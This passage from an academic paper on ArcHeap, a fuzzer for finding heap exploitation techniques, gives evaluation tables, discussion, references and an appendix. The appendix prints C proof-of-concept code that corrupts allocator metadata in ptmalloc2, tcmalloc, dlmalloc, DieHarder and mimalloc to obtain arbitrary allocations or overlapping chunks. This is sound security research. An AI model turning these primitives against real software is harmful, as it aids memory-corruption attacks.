C16   malloc_consolidate(): invalid chunk size          2.27     - ✓
C17   break adjusted to free malloc space               2.10.1   ✓ ✓
C18   corrupted size vs. prev_size                      2.26     ✓ ✓
C19   free(): invalid pointer                           2.0.1    ✓ ✓
C20   munmap_chunk(): invalid pointer                   2.4      ✓ ✓
C21   invalid fastbin entry (free)                      2.12.1

Table 11: Security checks in ptmalloc2 covered by ArcHeap: a unique identifier for a check, an error message for its failure, the version in which the check was first introduced, and the checks covered by ArcHeap in Ubuntu versions.

8.3 Delta-Debugging-Based Minimization

The minimization technique based on delta-debugging is effective in simplifying the generated PoCs for further analysis. It removes 84.3% of redundant actions from the original PoCs (refer to §7.3) and emits small PoCs that contain 26.1 lines on average (see Table 12). Although our minimization is preliminary (i.e., eliminating one independent action per test), the final PoC is sufficiently small for manual analysis to understand the impact of the found technique.

9 Discussion and Limitations

Completeness. ArcHeap is fundamentally incomplete due to its random nature, so it would not be surprising at all if someone discovers other heap exploitation techniques. HeapHopper, on the other hand, is complete in terms of given models, i.e., exploring all combinations of transactions given the length of transactions. Since their models are incomplete
(or often error-prone), proper use of each approach depends on the target use case. For example, if one is looking for a practical solution to find new exploitation techniques, ArcHeap would be a preferable platform to start with.

           Raw                 Minimized
Version    Mean    Std. dev    Mean             Std. dev
2.15       112.6   161         25.9 (-77.0 %)   25.3
2.19       110.8   145         23.3 (-79.0 %)   4.6
2.23       98.3    120         22.5 (-77.1 %)   6.2
2.27       344.2   177         33 (-90.4 %)     8.8
Average    166.5   150.8       26.2 (-84.3 %)   11.2

Table 12: Average and standard deviation of lines of raw and minimized PoCs using delta debugging. It shows that the delta debugging successfully removes 84.3% of redundant actions.

Overfitting to fuzzing strategies. ArcHeap's approach is quite generic in practice even though its fuzzing strategies are specific to the common design decisions in §2.1. First, ArcHeap can explore security issues related to APIs (e.g., double free) without loss of generality because of their standardization (see §7.2). Second, ArcHeap's approach of generating random metadata is practically useful thanks to the bipartite design of real-world allocators. In particular, a performance-focused allocator that places metadata in a chunk (e.g., ptmalloc2) has little motivation to avoid the use of in-place metadata or to violate the cardinal design, for the sake of performance. If an allocator is not performance-oriented, it will move its metadata to a dedicated place for better security (e.g., jemalloc). Such a design will make all methods that generate metadata useless in finding heap exploitation techniques. However, ArcHeap can still overfit: our fuzzing strategies could be insufficient to examine certain allocators. In this case, one might have to devise one's own models for proper space reduction to apply ArcHeap to a non-conventional implementation, requiring in-depth understanding of the target allocator. For example, if an allocator uses big-endian encoding for its size, a user should encode this in ArcHeap's fuzzing strategies.

Scope. Unlike other automatic exploit generation work, ArcHeap focuses only on finding heap exploit techniques. To make end-to-end exploits, we need to properly combine application contexts, which is currently out of scope for this project. Despite many open challenges in realizing fully automated exploit generation, we believe that ArcHeap can contribute by supplying useful primitives [58]. Moreover, ArcHeap focuses only on user-mode allocators. To extend ArcHeap to the kernel, we need to handle kernel-specific challenges, e.g., non-determinism and zone-based allocation.

10 Related work

Automatic exploit generation (AEG). Automatic discovery of heap exploit techniques is a small step toward AEG's ambitious vision [4, 10], but it is worth emphasizing its importance and difficulty. Despite several attempts to accomplish fully automated exploit generation [4, 10, 11, 33, 46, 58, 60, 70], AEG, particularly for heap vulnerabilities, is too sophisticated and difficult even for state-of-the-art cyber systems [21, 30, 62, 67]. Recently, Repel et al. [58] proposed symbolic-execution-based AEG for heap vulnerabilities, but it only works for much older allocators without security checks (ptmalloc2 version 2.3.3), unlike ArcHeap (2.23 and 2.27). Heelan et al. [33, 34] demonstrate AEG for heap overflows in interpreters, but it is specific to scriptable programs. Unlike the prior work, ArcHeap focuses on finding heap exploitation techniques, which are re-usable across applications, in modern allocators with full security checks.

Fuzzing beyond crashes. There has been a large body of attempts to extend fuzzing to find bugs beyond memory safety [29, 75]. They often use differential testing, which we used for minimization, to find semantic bugs in, e.g., compilers [73], cryptographic libraries [9, 53], JVM implementations [14] and learning systems [51]. Recently, SlowFuzz [54] uses fuzzing to find algorithmic complexity bugs, and IMF [69] to spot similar code in binaries.

Application-aware fuzzing. Application-aware fuzzing is one of the attempts to reduce the search space of fuzzing. In this regard, there have been attempts to use static and dynamic analysis [13, 44, 52, 57], bug descriptions [74], and real-world applications [12, 32, 39] to extract target-specific information for fuzzing. Moreover, to reduce the search space for applications that require well-formed inputs, researchers have embedded domain-specific knowledge such as grammar [35, 68, 73] or structure [9, 53] in their fuzzing. Similar to these works, ArcHeap reduces its search space by considering its targets, memory allocators, particularly exploiting their common designs.

11 Conclusion

In this paper, we present ArcHeap, a new approach using fuzzing to automatically discover new heap exploitation techniques. ArcHeap's two key ideas are to reduce the search space of fuzzing by abstracting the common design of modern heap allocators, and to devise a method to quickly estimate the possibility of heap exploitation. Our evaluation with ptmalloc2 and 10 other allocators shows that ArcHeap's approach can effectively formulate new exploitation primitives regardless of their underlying implementations.

12 Acknowledgment

We thank the anonymous reviewers for their helpful feedback. This research was supported, in part, by the NSF award CNS-1563848, CNS-1704701, CRI-1629851 and CNS-1749711, ONR under grant N00014-18-1-2662, N00014-15-1-2162, N00014-17-1-2895, DARPA AIMEE, and ETRI IITP/KEIT[2014-3-00035], and gifts from Facebook, Mozilla, Intel, VMware and Google.
References

[1] anonymous. Once upon a free()... http://phrack.org/issues/57/9.html, 2001.
[2] anonymous. Chrome os exploit: one byte overflow and symlinks. https://googleprojectzero.blogspot.com/2016/12/chrome-os-exploit-one-byte-overflow-and.html, 2016.
[3] argp and huku. Pseudomonarchia jemallocum. http://www.phrack.org/issues/68/10.html, 2012.
[4] T. Avgerinos, S. K. Cha, A. Rebert, E. J. Schwartz, M. Woo, and D. Brumley. AEG: Automatic exploit generation. In Proceedings of the 18th Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, Feb. 2011.
[5] T. Avgerinos, A. Rebert, S. K. Cha, and D. Brumley. Enhancing symbolic execution with veritesting. In Proceedings of the 36th International Conference on Software Engineering, pages 1083–1094. ACM, 2014.
[6] Awakened. How a double-free bug in WhatsApp turns to RCE. https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/, 2019.
[7] blackngel. Malloc des-maleficarum. http://phrack.org/issues/66/10.html, 2009.
[8] blackngel. The house of lore: Reloaded. http://phrack.org/issues/67/8.html, 2010.
[9] C. Brubaker, S. Jana, B. Ray, S. Khurshid, and V. Shmatikov. Using frankencerts for automated adversarial testing of certificate validation in ssl/tls implementations. In Proceedings of the 35th IEEE Symposium on Security and Privacy (Oakland), San Jose, CA, May 2014.
[10] D. Brumley, P. Poosankam, D. Song, and J. Zheng. Automatic patch-based exploit generation is possible: Techniques and implications. In Proceedings of the 29th IEEE Symposium on Security and Privacy (Oakland), Oakland, CA, May 2008.
[11] S. K. Cha, T. Avgerinos, A. Rebert, and D. Brumley. Unleashing mayhem on binary code. In Proceedings of the 33rd IEEE Symposium on Security and Privacy (Oakland), San Francisco, CA, May 2012.
[12] J. Chen, W. Diao, Q. Zhao, C. Zuo, Z. Lin, X. Wang, W. C. Lau, M. Sun, R. Yang, and K. Zhang. IoTFuzzer: Discovering memory corruptions in IoT through app-based fuzzing. In Proceedings of the 2018 Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, Feb. 2018.
[13] P. Chen and H. Chen. Angora: Efficient fuzzing by principled search. In Proceedings of the 39th IEEE Symposium on Security and Privacy (Oakland), San Francisco, CA, May 2018.
[14] Y. Chen, T. Su, C. Sun, Z. Su, and J. Zhao. Coverage-directed differential testing of jvm implementations. In Proceedings of the 2016 ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI), Santa Barbara, CA, June 2016.
[15] D. Delorie. malloc per-thread cache: benchmarks. https://sourceware.org/ml/libc-alpha/2017-01/msg00452.html, 2017.
[16] C. Eagle. Re: DARPA CGC recap. http://seclists.org/dailydave/2017/q2/2, 2017.
[17] M. Eckert, A. Bianchi, R. Wang, Y. Shoshitaishvili, C. Kruegel, and G. Vigna. HeapHopper: Bringing bounded model checking to heap implementation security. In Proceedings of the 27th USENIX Security Symposium (Security), Baltimore, MD, Aug. 2018.
[18] C. Evans and T. Ormandy. The poisoned NUL byte, 2014 edition. https://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html, 2014.
[19] J. Evans. Scalable memory allocation using jemalloc. https://code.fb.com/core-data/scalable-memory-allocation-using-jemalloc/, 2011.
[20] J. N. Ferguson. Understanding the heap by breaking it. In Black Hat USA Briefings (Black Hat USA), Las Vegas, NV, Aug. 2007.
[21] ForAllSecure. Unleashing the Mayhem CRS. https://forallsecure.com/blog/2016/02/09/unleashing-mayhem/, 2016.
[22] Free Software Foundation. The GNU C library. https://www.gnu.org/software/libc/, 1998.
[23] Free Software Foundation. MallocInternals - glibc wiki. https://sourceware.org/glibc/wiki/MallocInternals, 2017.
[24] Free Software Foundation. malloc(3) - Linux manual page. http://man7.org/linux/man-pages/man3/malloc.3.html, 2017.
[25] g463. The use of set_head to defeat the wilderness. http://phrack.org/issues/64/9.html, 2007.
[26] S. Ghemawat and P. Menage. Tcmalloc: Thread-caching malloc. http://goog-perftools.sourceforge.net/doc/tcmalloc.html, 2009.
[27] W. Gloger. Wolfram Gloger's malloc homepage. http://www.malloc.de/en/, 2006.
[28] F. Goichon. Glibc adventures: The forgotten chunk. https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunks, 2015.
[29] Google. syzkaller – linux syscall fuzzer. https://github.com/google/syzkaller, 2017.
[30] GrammaTech. http://blogs.grammatech.com/the-cyber-grand-challenge, 2016.
[31] Gzob Qq. ares_create_query single byte out of buffer write. https://c-ares.haxx.se/adv_20160929.html, 2016.
[32] H. Han and S. K. Cha. IMF: Inferred model-based fuzzer. In Proceedings of the 24th ACM Conference on Computer and Communications Security (CCS), Dallas, TX, Oct.–Nov. 2017.
[33] S. Heelan, T. Melham, and D. Kroening. Automatic heap layout manipulation for exploitation. In Proceedings of the 27th USENIX Security Symposium (Security), Baltimore, MD, Aug. 2018.
[34] S. Heelan, T. Melham, and D. Kroening. Gollum: Modular and greybox exploit generation for heap overflows in interpreters. In Proceedings of the 26th ACM Conference on Computer and Communications Security (CCS), London, UK, Nov. 2019.
[35] C. Holler, K. Herzig, and A. Zeller. Fuzzing with code fragments. In Proceedings of the 21st USENIX Security Symposium (Security), Bellevue, WA, Aug. 2012.
[36] huku. Yet another free() exploitation technique. http://phrack.org/issues/66/6.html, 2009.
[37] K. Istvan. ptmalloc fanzine. http://tukan.farm/2016/07/26/ptmalloc-fanzine/, 2016.
[38] jp. Advanced Doug lea's malloc exploits. http://phrack.org/issues/61/6.html, 2003.
[39] S. Y. Kim, S. Lee, I. Yun, W. Xu, B. Lee, Y. Yun, and T. Kim. CAB-Fuzz: Practical Concolic Testing Techniques for COTS Operating Systems. In Proceedings of the 2017 USENIX Annual Technical Conference (ATC), Santa Clara, CA, July 2017.
[40] G. Klees, A. Ruef, B. Cooper, S. Wei, and M. Hicks. Evaluating fuzz testing. In Proceedings of the 25th ACM Conference on Computer and Communications Security (CCS), Toronto, ON, Canada, Oct. 2018.
[41] D. Lea and W. Gloger. A memory allocator, 1996.
[42] B. Lee, C. Song, Y. Jang, T. Wang, T. Kim, L. Lu, and W. Lee. Preventing use-after-free with dangling pointers nullification. In Proceedings of the 2015 Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, Feb. 2015.
[43] D. Leijen. mimalloc. https://github.com/microsoft/mimalloc, 2019.
[44] Y. Li, B. Chen, M. Chandramohan, S.-W. Lin, Y. Liu, and A. Tiu. Steelix: program-state based binary fuzzing. In Proceedings of the 11th Joint Meeting of the European Software Engineering Conference (ESEC) and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE), Paderborn, Germany, Aug. 2018.
[45] LLVM Project. Scudo hardened allocator. https://llvm.org/docs/ScudoHardenedAllocator.html, 2019.
[46] K. Lu, M.-T. Walter, D. Pfaff, S. Nürnberger, W. Lee, and M. Backes. Unleashing use-before-initialization vulnerabilities in the linux kernel using targeted stack spraying. In Proceedings of the 2017 Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, Feb.–Mar. 2017.
[47] Meh. Exim off-by-one RCE: Exploiting CVE-2018-6789 with fully mitigations bypassing. https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/, 2019.
[48] M. Miller. A snapshot of vulnerability root cause trends for Microsoft Remote Code Execution (RCE) CVEs, 2006 through 2017. https://twitter.com/epakskape/status/984481101937651713, 2018.
[49] G. Novark and E. D. Berger. Dieharder: securing the heap. In Proceedings of the 17th ACM Conference on Computer and Communications Security (CCS), Chicago, IL, Oct. 2010.
[50] Offensive Security. Exploit database - exploits for penetration testers, researchers, and ethical hackers. https://www.exploit-db.com/, 2009.
[51] K. Pei, Y. Cao, J. Yang, and S. Jana. Deepxplore: Automated whitebox testing of deep learning systems. In Proceedings of the 26th ACM Symposium on Operating Systems Principles (SOSP), Shanghai, China, Oct. 2017.
[52] H. Peng, Y. Shoshitaishvili, and M. Payer. T-fuzz: fuzzing by program transformation. In Proceedings of the 39th IEEE Symposium on Security and Privacy (Oakland), San Francisco, CA, May 2018.
[53] T. Petsios, A. Tang, S. Stolfo, A. D. Keromytis, and S. Jana. Nezha: Efficient domain-independent differential testing. In Proceedings of the 38th IEEE Symposium on Security and Privacy (Oakland), San Jose, CA, May 2017.
[54] T. Petsios, J. Zhao, A. D. Keromytis, and S. Jana. Slowfuzz: Automated domain-independent detection of algorithmic complexity vulnerabilities. In Proceedings of the 24th ACM Conference on Computer and Communications Security (CCS), Dallas, TX, Oct.–Nov. 2017.
[55] P. Phantasmagoria. Exploiting the wilderness. http://seclists.org/vuln-dev/2004/Feb/25, 2004.
[56] B. Powers, D. Tench, E. D. Berger, and A. McGregor. Mesh: Compacting memory management for C/C++ applications. In Proceedings of the 2019 ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI), Phoenix, AZ, June 2019.
[57] S. Rawat, V. Jain, A. Kumar, L. Cojocar, C. Giuffrida, and H. Bos. Vuzzer: Application-aware evolutionary fuzzing. In Proceedings of the 2017 Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, Feb.–Mar. 2017.
[58] D. Repel, J. Kinder, and L. Cavallaro. Modular synthesis of heap exploits. In Proceedings of the ACM SIGSAC Workshop on Programming Languages and Analysis for Security, Dallas, TX, Oct. 2017.
[59] Rich Felker. musl libc. https://www.musl-libc.org/, 2011.
[60] E. J. Schwartz, T. Avgerinos, and D. Brumley. Q: Exploit hardening made easy. In Proceedings of the 20th USENIX Security Symposium (Security), San Francisco, CA, Aug. 2011.
[61] shellphish. how2heap: A repository for learning various heap exploitation techniques. https://github.com/shellphish/how2heap, 2016.
[62] Shellphish. DARPA CGC – shellphish. http://shellphish.net/cgc/, 2016.
[63] Y. Shoshitaishvili, R. Wang, C. Salls, N. Stephens, M. Polino, A. Dutcher, J. Grosen, S. Feng, C. Hauser, C. Kruegel, and G. Vigna. SoK: (State of) The Art of War: Offensive Techniques in Binary Analysis. In IEEE Symposium on Security and Privacy, 2016.
[64] S. Silvestro, H. Liu, C. Crosser, Z. Lin, and T. Liu. Freeguard: A faster secure heap allocator. In Proceedings of the 24th ACM Conference on Computer and Communications Security (CCS), Dallas, TX, Oct.–Nov. 2017.
[65] S. Silvestro, H. Liu, T. Liu, Z. Lin, and T. Liu. Guarder: A tunable secure allocator. In Proceedings of the 27th USENIX Security Symposium (Security), Baltimore, MD, Aug. 2018.
[66] st4g3r. House of einherjar - yet another heap exploitation technique on GLIBC. https://github.com/st4g3r/House-of-Einherjar-CB2016, 2016.
[67] Trail of Bits. How we fared in the Cyber Grand Challenge. https://blog.trailofbits.com/2015/07/15/how-we-fared-in-the-cyber-grand-challenge/, 2015.
[68] J. Wang, B. Chen, L. Wei, and Y. Liu. Skyfire: Data-driven seed generation for fuzzing. In Proceedings of the 38th IEEE Symposium on Security and Privacy (Oakland), San Jose, CA, May 2017.
[69] S. Wang and D. Wu. In-memory fuzzing for binary code similarity analysis. In Proceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering (ASE), Urbana-Champaign, IL, Oct.–Nov. 2017.
[70] Y. Wang, C. Zhang, X. Xiang, Z. Zhao, W. Li, X. Gong, B. Liu, K. Chen, and W. Zou. Revery: From proof-of-concept to exploitable. In Proceedings of the 25th ACM Conference on Computer and Communications Security (CCS), Toronto, ON, Canada, Oct. 2018.
[71] D. Weston and M. Miller. Windows 10 mitigation improvements. In Black Hat USA Briefings (Black Hat USA), Las Vegas, NV, Aug. 2016.
[72] T. Xie, Y. Zhang, J. Li, H. Liu, and D. Gu. New exploit methods against ptmalloc of glibc. In Trustcom/BigDataSE/ISPA, 2016 IEEE, pages 646–653. IEEE, 2016.
[73] X. Yang, Y. Chen, E. Eide, and J. Regehr. Finding and understanding bugs in c compilers. In Proceedings of the 2011 ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI), San Jose, CA, June 2011.
[74] W. You, P. Zong, K. Chen, X. Wang, X. Liao, P. Bian, and B. Liang. SemFuzz: Semantics-based automatic generation of proof-of-concept exploits. In Proceedings of the 24th ACM Conference on Computer and Communications Security (CCS), Dallas, TX, Oct.–Nov. 2017.
[75] M. Zalewski. american fuzzy lop. http://lcamtuf.coredump.cx/afl/, 2014.
[76] A. Zeller. Yesterday, my program worked. today, it does not. why? In Proceedings of the 7th European Software Engineering Conference (ESEC) / 7th ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE), Toulouse, France, Sept. 1999.
[77] H. Zhao, Y. Zhang, K. Yang, and T. Kim. Breaking turtles all the way down: An exploitation chain to break out of vmware esxi. In Proceedings of the 13th USENIX Workshop on Offensive Technologies (WOOT), Santa Clara, CA, USA, Aug. 2019.
A Appendix

A.1 Security of Custom Allocators

To further evaluate the generality of ArcHeap, we applied it to all custom heap allocators implemented for the DARPA CGC competition. Since many challenges share the same implementation, we selected nine unique ones for our evaluation (see Table 13). We implemented a missing API (i.e., malloc_usable_size()) to get the size of allocated objects and ran the experiment for 24 hours for each heap allocator. As in the previous experiment, no specific model is provided.

ArcHeap found exploitation primitives for all of the tested allocators except NRFIN_00007, which implements a page heap. Such an allocator looks secure in terms of metadata corruption, but it is impractical due to its memory overheads, which cause internal fragmentation. During this evaluation, we found two interesting results. First, ArcHeap found exploitation techniques for NRFIN_00032, which has a heap cookie to detect overflows. Although this cookie-based protection is not bypassable via heap metadata corruption, ArcHeap found that the implementation is vulnerable to an integer overflow and could craft two overlapping chunks without corrupting the heap cookie. Second, ArcHeap found an incorrect implementation of the allocator in CROMU_00004, which returns a chunk that is free or whose size is larger than the request. ArcHeap successfully crafted PoC code resulting in overlapping chunks by allocating a smaller chunk than the previous allocation. This experiment indicates that our common heap designs are indeed universal, even for modern and custom heap allocators (§2.1).

Challenge      Impacts of exploitation
               OC OC RW AW
CROMU_00003    ✓ ✓ ✓ ✓
CROMU_00004    ✓ ✓ ✓ ✓
KPRCA_00002    ✓ ✓ ✓ ✓
KPRCA_00007    ✓ ✓ ✓ ✓
NRFIN_00007
NRFIN_00014    ✓ ✓ ✓ ✓
NRFIN_00024    ✓ ✓ ✓ ✓
NRFIN_00027    ✓ ✓ ✓ ✓
NRFIN_00032    ✓ ✓

Table 13: Exploitation techniques found by ArcHeap in custom allocators of CGC. Except for NRFIN_00007, which implements a page heap, ArcHeap successfully found exploitation techniques in the custom allocators.

A.2 Search Heuristics in HeapHopper

We also evaluated all search heuristics [63] supported by HeapHopper that can be applied without exploit-specific information; for example, we exclude the strategy called ManualMergepoint, which requires an address in a binary to merge states. As a result, we collected five search heuristics: DFS, which is the default mode of HeapHopper; Concretizer, which aggressively concretizes symbolic values to reduce the number of paths; Unique, which selects states according to their uniqueness for better coverage; Stochastic, which randomly selects the next states to explore; and Veritesting [5], which merges states to suppress path explosion by combining static and dynamic symbolic execution.

Unfortunately, as shown in Table 14, none of them was helpful in our evaluation; the default mode (DFS) shows the best performance. First, these heuristics only help to mitigate, but cannot solve, the fundamental problems of HeapHopper: path explosion and exponentially growing combinations of transactions. More seriously, unlike DFS, they cannot exploit a concrete model from HeapHopper to alleviate the aforementioned issues. This explains DFS's best performance and Stochastic's worst performance. Veritesting failed due to its incorrect handling of undefined behaviors (e.g., NULL dereference) in merged states, which are common in our task assuming memory corruptions.

                 New Techniques                  Old Techniques (Bug+Impact+Chunks)
Heuristic        UBS     HUE     UDF     OCS     FD      UU      HS      PN      HL      OC      UB      HE
DFS (Default)    ∞       ∞       ∞       ∞       3.8 m   ∞       31.4 s  ∞       ∞       ∞       21.8 s  ∞
Concretizer      ∞       ∞       ∞       ∞       2.90 h  ∞       1.96 m  ∞       ∞       ∞       5.25 m  ∞
Stochastic       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞
Unique           ∞       ∞       ∞       ∞       2.91 h  ∞       2.02 m  ∞       ∞       ∞       51.91 s ∞
Veritesting      ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞       ∞

Table 14: Results of §8.1 with various search heuristics supported by HeapHopper.

```c
// [PRE-CONDITION]
//   fsz: fast bin size
//   sz: non-fast-bin size
//   lsz: size larger than page (> 4096)
//   xlsz: very large size that cannot be allocated
// [BUG] buffer overflow
// [POST-CONDITION]
//   malloc(sz) == dst
void* p0 = malloc(sz);
void* p1 = malloc(xlsz);
void* p2 = malloc(lsz);
void* p3 = malloc(sz);

// [BUG] overflowing p3 to overwrite top chunk
struct malloc_chunk *tc = raw_to_chunk(p3 + chunk_size(sz));
tc->size = 0;

void* p4 = malloc(fsz);
void* p5 = malloc(dst - p4 - chunk_size(fsz)
                  - offsetof(struct malloc_chunk, fd));
assert(dst == malloc(sz));
```

Figure A.1: An exploitation technique for dlmalloc-2.8.6 returning an arbitrary chunk using an overflow bug that was found by ArcHeap.

```c
// [PRE-CONDITION]
//   sz : any size
// [BUG] buffer overflow
// [POST-CONDITION]
//   malloc(sz) == dst
void* p = malloc(sz);
// [BUG] overflowing p
// tcmalloc has a next chunk address at the end of a chunk
*(void**)(p + malloc_usable_size(p)) = dst;

// this malloc changes a next chunk address into dst
malloc(sz);

assert(malloc(sz) == dst);
```

Figure A.2: An exploitation technique for tcmalloc returning an arbitrary address that was found by ArcHeap.

```c
// [PRE-CONDITION]
//   lsz : large size (> 64 KB)
//   xlsz: larger size (>= lsz + 4KB)
// [BUG] double free
// [POST-CONDITION]
//   p2 == malloc(lsz);
void* p0 = malloc(lsz);
free(p0);
void* p1 = malloc(xlsz);

// [BUG] free 'p0' again
free(p0);

void* p2 = malloc(lsz);
free(p1);

assert(p2 == malloc(lsz));
```

Figure A.3: An exploitation technique for DieHarder and mimalloc-secure triggering double free that was found by ArcHeap.
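The overlapping-chunks impact discussed in A.1, and the kind of integer overflow that can lead to it, can be illustrated with a minimal sketch. Everything below is an assumption made for illustration: the helper names, the fixed 16-byte header (HDR_SIZE), and the padding arithmetic are hypothetical and are not taken from NRFIN_00032 or any other CGC allocator, whose actual bug is not described in the text.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: a fixed per-chunk header size; not taken from any CGC allocator. */
#define HDR_SIZE ((size_t)16)

/* True if [a, a + a_len) and [b, b + b_len) share at least one byte.
 * Written with subtractions so that no address addition can wrap. */
static bool ranges_overlap(uintptr_t a, size_t a_len, uintptr_t b, size_t b_len)
{
    if (a_len == 0 || b_len == 0)
        return false;
    return (a <= b) ? (b - a < a_len) : (a - b < b_len);
}

/* Unchecked padding: wraps around for requests close to SIZE_MAX,
 * so a huge request can silently become a tiny chunk. */
static size_t padded_size_unchecked(size_t req)
{
    return req + HDR_SIZE;
}

/* Checked padding: rejects requests whose padded size would wrap. */
static bool padded_size_checked(size_t req, size_t *out)
{
    if (req > SIZE_MAX - HDR_SIZE)
        return false;
    *out = req + HDR_SIZE;
    return true;
}
```

With a real allocator, the lengths passed to ranges_overlap() would typically come from malloc_usable_size(), which is why that API had to be supplied for the CGC allocators. Under the assumed 16-byte header, padded_size_unchecked(SIZE_MAX - 3) wraps to 12, whereas the checked variant refuses the request.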
```c
// [PRE-CONDITION]
//   sz : any non-fast-bin size
// [BUG] buffer overflow
// [POST-CONDITION]
//   malloc(sz) == dst + offsetof(struct malloc_chunk, fd)
void* p0 = malloc(sz);
void* p1 = malloc(sz);
void* p2 = malloc(sz);

// move p1 to the unsorted bin
free(p1);

// create a fake chunk at dst
struct malloc_chunk *fake = dst;
// set fake->size to be the chunk size of the last allocation
fake->size = chunk_size(sz);
// set fake->bk to any writable address to avoid a crash
fake->bk = fake;

// [BUG] overflowing p0
struct malloc_chunk *c1 = raw_to_chunk(p1);
// size should be smaller than the next allocation size
// to avoid returning c1 in the next allocation
// size shouldn't be too small due to a security check
c1->size = 2 * sizeof(size_t);
// set the next pointer in the unsorted bin
c1->bk = fake;

// now unsorted bin: c1 -> fake,
// and c1 is too small for the request.
// therefore, next allocation returns the fake chunk
// (cast to char* so that the offset is counted in bytes)
assert(malloc(sz) == (char *)fake
                     + offsetof(struct malloc_chunk, fd));
```

Figure A.4: A new exploitation technique that ArcHeap found, named unsorted bin into stack, that returns arbitrary memory by corrupting the unsorted bin.

```c
// [PRE-CONDITION]
//   sz : any small bin size
//   sz2 : any small bin size
//   assert(sz2 > sz)
// [BUG] buffer overflow
// [POST-CONDITION] two chunks overlap
void* p0 = malloc(sz);
void* p1 = malloc(sz);
void* p2 = malloc(sz);

// move p1 to the unsorted bin
free(p1);

// move p1 to the small bin
void* p3 = malloc(sz2);

// [BUG] overflowing p0
struct malloc_chunk *c1 = raw_to_chunk(p1);
// growing size into double
c1->size = 2 * chunk_size(sz) | 1;

// p4's chunk size = chunk_size(sz) * 2
void *p4 = malloc(sz);
// move p4 to the unsorted bin
free(p4);

// splitting p4 into half and returning p5
void* p5 = malloc(sz);
// returning the remainder
void* p6 = malloc(sz);

// p2 and p6 overlap
assert(p2 == p6);
```

Figure A.5: A new exploitation technique that ArcHeap found, named overlapping chunks smallbin, that returns an overlapped chunk in the small bin. Even though this requires more steps than overlapping chunks, it does not need an accurate size for allocation.

```c
// [PRE-CONDITION]
//   sz1: non-fast-bin size
//   sz2: non-fast-bin size
//   sz1 and sz2 have the following relationship;
//   assert(chunk_size(sz1) * a == chunk_size(sz2) * b);
// [BUG] double free
// [POST-CONDITION] two chunks overlap
for (int i = 0; i < a; i++)
  p1[i] = malloc(sz1);

// allocate a chunk to prevent merging with the top chunk
void* p = malloc(0);

// free from backward not to modify size of p1[a - 1]
for (int i = a - 1; i >= 0; i--)
  free(p1[i]);

// allocate chunks to fill empty space
for (int i = 0; i < b; i++)
  p2[i] = malloc(sz2);

// now the next free chunk of p1[a-1] is p whose P=1,
// and p1[a-1] contains old, yet valid metadata
// [BUG] double free
free(p1[a-1]);

// new allocation returns p1[a-1] that overlaps with p2[b-1]
assert(malloc(sz1) == p1[a-1]);
```

Figure A.6: A new exploitation technique that ArcHeap found, named unaligned double free, that returns overlapped chunks by the double free bug.

```c
// [PRE-CONDITION]
//   sz: small bin size
//   assert((chunk_size(sz) & 0xff) == 0);
// [BUG] off-by-one NULL
// [POST-CONDITION]
//   raw_to_chunk(malloc(sz)) == fake
char *p1 = malloc(sz);
char *p2 = malloc(sz);
char *p3 = malloc(sz);
char *p4 = malloc(sz);

// move p1 to unsorted bin
free(p1);
struct malloc_chunk* c3 = raw_to_chunk(p3);

// make prev_size into double to cover a large chunk
// this is valid by writing p2's last data
c3->prev_size = chunk_size(sz) * 2;

// [BUG] use off-by-one NULL to make P=0 in c3
assert((c3->size & 0xff) == 0x01);
c3->size &= ~1;

// this will merge p1 & p3
free(p3);

// if we allocate p5,
// p2 now points to a free chunk in the unsorted bin
char *p5 = malloc(sz);

// it's unsorted bin into stack
struct malloc_chunk* fake = (void*)buf;

// set fake->size to chunk_size(sz) for later allocation
fake->size = chunk_size(sz);

// set fake->bk to any writable address to avoid crash
fake->bk = (void*)buf;

struct malloc_chunk* c2 = raw_to_chunk(p2);
c2->bk = fake;
assert(raw_to_chunk(malloc(sz)) == fake);
```

Figure A.7: A new exploitation technique that ArcHeap found, named house of unsorted einherjar. This is a variant of a known heap exploitation technique, house of einherjar, but it does not require a heap address unlike the old one.
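The size pre-conditions of Figures A.6 and A.7 can be checked with simple arithmetic. The following is a minimal sketch under stated assumptions: chunk_size() here is our own stand-in modeled on glibc's request2size for a 64-bit ptmalloc2 layout (8-byte size field, 16-byte alignment, 32-byte minimum chunk), not the helper used in the figures, and the functions unaligned_counts(), after_null_byte(), and null_byte_keeps_size() are hypothetical names introduced only for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed 64-bit ptmalloc2 layout constants (modeled on glibc, not from the paper). */
#define SIZE_SZ    ((uint64_t)8)   /* size of one size field          */
#define ALIGN_MASK ((uint64_t)15)  /* 16-byte chunk alignment minus 1 */
#define MIN_CHUNK  ((uint64_t)32)  /* smallest possible chunk         */
#define PREV_INUSE ((uint64_t)1)   /* the P bit in a size field       */

/* Chunk size for a request, in the style of glibc's request2size. */
static uint64_t chunk_size(uint64_t req)
{
    uint64_t padded = (req + SIZE_SZ + ALIGN_MASK) & ~ALIGN_MASK;
    return padded < MIN_CHUNK ? MIN_CHUNK : padded;
}

static uint64_t gcd_u64(uint64_t x, uint64_t y)
{
    while (y != 0) {
        uint64_t r = x % y;
        x = y;
        y = r;
    }
    return x;
}

/* Smallest a, b > 0 with chunk_size(sz1) * a == chunk_size(sz2) * b,
 * i.e., the pre-condition of Figure A.6. */
static void unaligned_counts(uint64_t sz1, uint64_t sz2,
                             uint64_t *a, uint64_t *b)
{
    uint64_t c1 = chunk_size(sz1), c2 = chunk_size(sz2);
    uint64_t g = gcd_u64(c1, c2);
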